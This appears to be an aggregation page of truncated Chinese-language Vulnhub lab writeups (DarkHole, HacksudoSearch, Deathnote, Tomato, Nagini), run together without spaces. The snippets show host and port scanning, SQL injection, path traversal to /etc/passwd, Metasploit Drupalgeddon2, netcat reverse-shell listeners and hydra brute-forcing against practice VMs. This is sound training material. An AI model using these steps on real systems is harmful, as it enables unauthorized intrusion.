Vulnhub-DarkHole_2-Writeup
全部标签1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.151查看端口服务nmap-A-sV-p21,22,80,801121端口ftp没有有效信息,所以重点在80,80112.漏洞挖掘开始网站浏览没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)dirbhttp://192.168.42.151dirbhttp://192.168.42.151:8011dirbhttp://192.168.42.151-X.bak查看源代码,发现敏感目录,登录账号catindex.html.bak192.168.42.151/develop
🖳主机发现熟悉的netdiscover-r─$sudonetdiscover-r192.168.234.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenMACVendor/Hostname--------------------------
1.信息收集扫描主机sudoarp-scan-l扫描端口,发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能,猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功,存在注入漏洞,开始利用bp开始抓包,跑sqlmap跑出了admin的账号和密码密码明显长度不太对,猜测为md5加密,在网上在线破解,得到密码admin登录,开始逛街发现下面提示,猜测有文件包含漏洞(目录穿越)不放心可以多敲几个../?file=../../../../../../../../../etc/pa
1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含包含文件为footer.php3.漏洞利用开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)thankyou.php?file=/ect/pass
HacksudoSearch识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtM
1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹,没有收获查找目录,无敏感信息2.漏洞利用访问网站,发现只有登录框,猜测为弱密码或密码爆破bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)账号密码为adminhappy进入网站,测试功能,发现命令执行漏洞bp抓包,开始利用反弹shell(在此之前要在kali中监听)nc-lvp77773.横向渗透反弹成功,得到shell在目录中查找敏感信息,找到oldpassword九头蛇爆破jimshh密码登录ssh,jim在ssh中找到charles账号密码(因为ls
1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2脚本exp得到反弹shell找到脚本,修改脚本,执行脚本nc监听8888端口得到反弹shellpython-c"importpty;pty.spawn('/bin/bash')"美化一下3.me
Deathnote0x01信息收集渗透的第一件事那就是信息收集,虚拟机启动起来,nmap扫一手, 192.168.56.101存在,并且开启了80和22端口,那么就访问页面。但是页面返回的结果是没找到http://deathnote.vuln这个网址 那么根据我做题的经验,这应该是需要绑定域名的,意思就是192.168.56.101跟deathnote.vuln这个域名是绑定在一起的,访问192.168.56.101就会跳转到deathnote.vuln。在windows上配置dnsC:\WINDOWS\system32\drivers\etc的hosts文件加入如下字段(linux上是/et
Tomato靶场练习---低0x00部署0x01信息收集1.主机发现2.端口扫描3.信息收集(漏洞扫描)4.路径爬取5.源码分析0x02漏洞渗透1.文件包含2.写入日志反弹shell3.内核漏洞枚举4.本地提权0x00部署Tomato靶机:下载地址宿主机:kali2022目标:获取root拿到flag文件0x01信息收集1.主机发现$sudoarp-scan-l//因为靶机与宿主机在同一网段,所以用二级扫描来发现靶机ip2.端口扫描//使用namp命令,-p-指定ip,查看哪些端口开放$sudonmap-p-靶机ip$sudonmap-sC-sV-O-p21,80,2211,8888靶机ip/
一、部署方法在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Nagini.ova使用VMware搭建靶机环境攻击机使用VMware上搭建的kali靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。二、靶机下载安装靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤三、渗透测试1.确认目标扫描网段arp-scan-l确认靶机IP:192.168.15.1342.信息收集使用nmap对靶机深度扫描nmap-A-T4-p-192.168.15.134扫描得知,靶机对外开放了22和80端口浏览器访问80端口:http: